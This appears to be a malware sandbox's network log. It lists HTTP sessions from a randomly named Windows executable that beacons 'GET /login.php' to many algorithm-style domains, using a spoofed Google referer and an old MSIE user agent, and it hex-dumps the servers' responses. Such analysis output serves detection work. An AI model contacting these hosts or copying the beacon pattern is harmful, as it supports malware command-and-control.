padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.6	50524	75.2.71.199	80	4180	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:44.500790119 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Nov 11, 2024 18:13:44.926908970 CET	166	IN	HTTP/1.1 308 Permanent Redirect Connection: close Location: https://puzylyp.com/login.php Server: Caddy Date: Mon, 11 Nov 2024 17:13:44 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.6	50525	18.208.156.248	80	4180	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:44.500842094 CET	353	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345217\|1731345181\|18\|2\|0
Nov 11, 2024 18:13:44.928672075 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.6	64008	188.114.97.3	80	4180	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:44.531507015 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Nov 11, 2024 18:13:45.253226042 CET	970	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 11 Nov 2024 17:13:45 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hRrxDyedG1W7x2vDKDDW9hUDwJNKvuyBXh6mR%2FJh%2BerxlBInxEOcDavUuYGlMgkcbUU9bkKwtk%2FDvYH0wSVA7eNft8I5%2BKgkNty8X03BVNwRv7zwqCWePmxJ1K4nAA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fea27fd61c33b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1140&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.6	59139	199.191.50.83	80	4180	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:46.089176893 CET	281	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478890781963739088
Nov 11, 2024 18:13:48.298973083 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 17:13:46 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw== Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 61 38 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED] Data Ascii: a8fe<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
Nov 11, 2024 18:13:48.298988104 CET	94	IN	Data Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f Data Ascii: f(!("cmp_id" in window)\|\|window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.c
Nov 11, 2024 18:13:48.299021006 CET	1236	IN	Data Raw: 6d 70 5f 63 64 69 64 3d 22 32 31 66 64 63 61 32 32 38 31 38 33 33 22 7d 69 66 28 21 28 22 63 6d 70 5f 70 61 72 61 6d 73 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 70 61 72 61 6d 73 3d 22 22 7d 69 66 28 21 28 22 63 Data Ascii: mp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in windo
Nov 11, 2024 18:13:48.299072027 CET	1236	IN	Data Raw: 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 73 3a 5b 5d 3b 69 66 28 66 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 21 3d 2d 31 29 7b 63 2e 70 75 73 68 28 66 2e 73 75 62 73 74 72 28 66 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c Data Ascii: vigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.push(e.substr(e.indexOf("cmplang=")+8,2).toUpperCase())}else{if("cmp_setlang" in window&&window.c
Nov 11, 2024 18:13:48.299084902 CET	1236	IN	Data Raw: 78 4f 66 28 69 29 2b 73 2c 39 39 39 39 29 7d 65 6c 73 65 7b 69 66 28 64 2e 73 65 61 72 63 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d 64 2e 73 65 61 72 63 68 2e 73 75 62 73 74 72 28 64 2e 73 65 61 72 63 68 2e 69 6e 64 65 78 4f 66 Data Ascii: xOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.indexOf("&"))}return w}var k=("cmp_proto" in h)?h.cmp_proto:"https:";if(k!="http:"&&k!="https:")
Nov 11, 2024 18:13:48.299135923 CET	1236	IN	Data Raw: 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 76 61 72 20 74 3d 76 28 22 62 6f 64 79 22 29 3b 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 64 69 76 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d Data Ascii: .appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}var m="js";var p=x("cmpdebugu
Nov 11, 2024 18:13:48.299149036 CET	848	IN	Data Raw: 74 69 6f 6e 61 6c 6c 79 20 68 69 64 64 65 6e 2c 20 70 6c 65 61 73 65 20 69 67 6e 6f 72 65 22 29 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 72 6f 6c 65 22 2c 22 6e 6f 6e 65 22 29 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 Data Ascii: tionally hidden, please ignore");a.setAttribute("role","none");a.setAttribute("tabindex","-1");document.body.appendChild(a)}else{window.setTimeout(window.cmp_addFrame,10,b)}}};window.cmp_rc=function(h){var b=document.cookie;var f="";var d=0;wh
Nov 11, 2024 18:13:48.299194098 CET	1236	IN	Data Raw: 66 28 61 5b 30 5d 3d 3d 3d 22 67 65 74 55 53 50 44 61 74 61 22 29 7b 61 5b 32 5d 28 7b 76 65 72 73 69 6f 6e 3a 31 2c 75 73 70 53 74 72 69 6e 67 3a 77 69 6e 64 6f 77 2e 63 6d 70 5f 72 63 28 22 22 29 7d 2c 74 72 75 65 29 7d 65 6c 73 65 7b 69 66 28 Data Ascii: f(a[0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListener"\|\|a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.le
Nov 11, 2024 18:13:48.299206018 CET	212	IN	Data Raw: 65 63 74 69 6f 6e 49 64 3a 33 2c 67 70 70 56 65 72 73 69 6f 6e 3a 31 2c 73 65 63 74 69 6f 6e 4c 69 73 74 3a 5b 5d 2c 61 70 70 6c 69 63 61 62 6c 65 53 65 63 74 69 6f 6e 73 3a 5b 30 5d 2c 67 70 70 53 74 72 69 6e 67 3a 22 22 2c 70 69 6e 67 44 61 74 Data Ascii: ectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"\|\|g==="getSection"\|\|g==="getField"){return null}else{__gpp.q.push([].slice.apply(
Nov 11, 2024 18:13:48.300898075 CET	1236	IN	Data Raw: 61 29 29 7d 7d 7d 7d 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 6d 73 67 68 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 64 2e 64 61 74 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3b 74 72 79 7b 76 61 72 Data Ascii: a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&&c!==null&&"__cmpCall" in c){var b=c.__cmpCall;window.__cmp(b.command,b.parameter,func
Nov 11, 2024 18:13:48.304662943 CET	1236	IN	Data Raw: 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 6f 62 6a 65 63 74 22 26 26 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 77 69 6e 64 6f 77 5b 61 5d 21 3d 3d 6e 75 6c 6c 29 29 29 7b 77 69 6e 64 6f 77 5b Data Ascii: ndow[a])!=="object"&&(typeof(window[a])==="undefined"\|\|window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEventListener("message",window.cmp_msghandler,false)}};window.cmp_setGppStub=function(a){

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.6	59140	85.17.31.82	80	4180	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:46.136781931 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.6	59144	199.59.243.227	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:47.634289026 CET	305	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Nov 11, 2024 18:13:48.094137907 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 17:13:47 GMT content-type: text/html; charset=utf-8 content-length: 1094 x-request-id: 92711589-b7f8-44fe-9eac-bb06f1a1a90c cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ== set-cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da; expires=Mon, 11 Nov 2024 17:28:48 GMT Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
Nov 11, 2024 18:13:48.094166994 CET	520	IN	Data Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZmY0YTM5M2UtMWE2MS00NTQzLTkyYjItOGRkOGNhNjUzNGRhIiwicGFnZV90aW1lIjoxNzMxMzQ1MjI4LCJwYWdlX3VybCI6Imh0dHA6L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.6	59147	154.212.231.82	80	936	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:47.638308048 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Nov 11, 2024 18:13:48.550821066 CET	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:13:48 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.6	59148	44.221.84.105	80	936	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:47.638638020 CET	353	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345224\|1731345181\|21\|2\|0
Nov 11, 2024 18:13:48.095720053 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:48 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345228\|1731345181\|12\|3\|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.6	59146	188.114.97.3	80	936	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:47.639712095 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Nov 11, 2024 18:13:48.353534937 CET	966	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 11 Nov 2024 17:13:48 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DilcLZ%2Fbytm7f3tuIWGJFC8asQbCf2laNeCng9CRUMToQjqrtxRxFYQuhzAfgfB5g4YJbcSfoZdfVIC7xbAL%2BV2GuT75j28m78nNah6dZ7g4VgGXrXpdDbdXfcx2Tg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fea3b4d1543cb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1934&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.6	59145	23.253.46.64	80	936	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:47.640121937 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
